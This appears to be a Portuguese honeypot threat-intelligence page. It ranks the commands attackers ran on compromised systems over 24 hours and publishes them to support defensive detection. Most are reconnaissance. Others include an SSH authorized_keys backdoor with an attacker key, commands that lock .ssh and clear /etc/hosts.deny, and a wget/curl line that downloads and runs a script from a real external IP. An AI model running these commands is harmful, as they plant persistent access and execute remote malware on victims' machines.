Comandos Executados

Analise em tempo real dos comandos mais executados por atacantes apos obter acesso ao sistema. Dados coletados da nossa rede global de honeypots nas ultimas 24 horas.

9789 comandos em 24h

Top Comandos Executados

$Enter new UNIX password:

277 IPs687x

$uname -s -v -n -m 2 > /dev/null

151 IPs516x

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

144 IPs469x

$lockr -ia .ssh

337 IPs468x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

296 IPs391x

$uname -a

284 IPs379x

$uname

286 IPs376x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

292 IPs375x

$cat /proc/cpuinfo | grep name | wc -l

288 IPs373x

10.

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

289 IPs371x

11.

$uname -m

276 IPs366x

12.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

279 IPs363x

13.

$crontab -l

275 IPs361x

14.

$whoami

276 IPs361x

15.

$w

276 IPs359x

16.

$lscpu | grep Model

273 IPs357x

17.

$cat /proc/cpuinfo | grep model | grep name | wc -l

273 IPs356x

18.

$top

270 IPs355x

19.

$which ls

267 IPs344x

20.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

266 IPs340x

21.

$ls -lh $(which ls)

258 IPs317x

22.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

57 IPs301x

23.

$uname -m 2 > /dev/null

57 IPs159x

24.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

73 IPs75x

25.

$/bin/./uname -s -v -n -r -m

15 IPs37x

26.

$uname -s -v -n -r -m

13 IPs28x

27.

$if [ [ ! -d ${HOME}/.ssh ] ]

6 IPs15x

28.

$then

6 IPs15x

29.

$nproc

6 IPs14x

30.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs13x

Reconhecimento

Comandos para obter informacoes do sistema (uname, whoami, cat /etc/passwd)

Download

Comandos para baixar malware (wget, curl, tftp)

Persistencia

Comandos para manter o acesso (crontab, chmod, chattr)

Movimento Lateral

Comandos para se expandir na rede (ssh, scp, ping)

Sobre estes dados

Estes comandos sao capturados em tempo real quando atacantes obtem acesso aos nossos honeypots. Representam as tecnicas reais utilizadas em ataques automatizados e manuais. Utilize esta informacao para melhorar sua deteccao de ameacas e resposta a incidentes.